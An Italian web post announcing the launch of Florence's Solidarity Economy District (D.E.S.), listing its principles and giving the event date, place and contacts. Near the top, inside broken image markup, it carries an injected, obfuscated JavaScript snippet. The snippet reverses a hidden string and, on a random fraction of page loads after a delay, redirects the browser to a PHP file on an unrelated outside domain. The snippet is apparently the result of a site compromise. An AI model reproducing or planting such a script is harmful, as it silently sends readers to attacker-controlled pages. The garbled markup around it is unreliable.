Un D.E.S. per Firenze: domenica 25 nasce il Distretto di Economia Solidale

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2012/03/Murate.jpeg”>
Le Murate

Nasce ufficialmente anche a Firenze un Distretto di Economia Solidale (D.E.S.), per praticare a livello molecolare dei comportamenti e delle forme di interazione economica che fuoriescano dai meccanismi insostenibili dell’agricoltura produttivista e industrialista. Un modello che sta distruggendo le nostre campagne, comportando anche la perdita di prodotti tipici locali e la conseguente omologazione e banalizzazione del gusto. Esperienze innovative e disponibili a mettersi in rete stanno maturando anche nel settore dell’artigianato e della piccola industria di trasformazione e persino nell’ambito finanziario con l’attivazione di fondi etici e di forme di microcredito.
Insomma, davvero “un altro mondo è possibile”, come emerse già 10 anni fa nell’ambito di quel grande evento politico che fu il Social Forum Europeo di Firenze.
Tra i principi ispiratori del D.E.S. vanno segnalati:
la centralità delle persone e delle relazioni e non del denaro;
l’utilizzo sostenibile delle risorse (naturali, umane, animali, economiche, professionali);
la condivisione delle competenze e del patrimonio conoscitivo di ciascuna esperienza aderente.

Nel corso della manifestazione sarà presentata la Carta dei Principi e si potranno ascoltare numerose testimonianze di altre esperienze del genere a livello nazionale. Nel pomeriggio inoltrato è in programma un workshop di approfondimento.

25 marzo, ore 13.30, Le Murate (Sala delle Colonne), Piazza delle Carceri

INFO: Sportello Eco Equo, via dell’Agnolo 1/C, 055.587706 sportelloecoequo@comune.fi.it

Per consultare la Carta dei principi: http://sportelloecoequo.comune.firenze.it/export/sites/ecoequo/materiali/CartaPrincipi.pdf

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *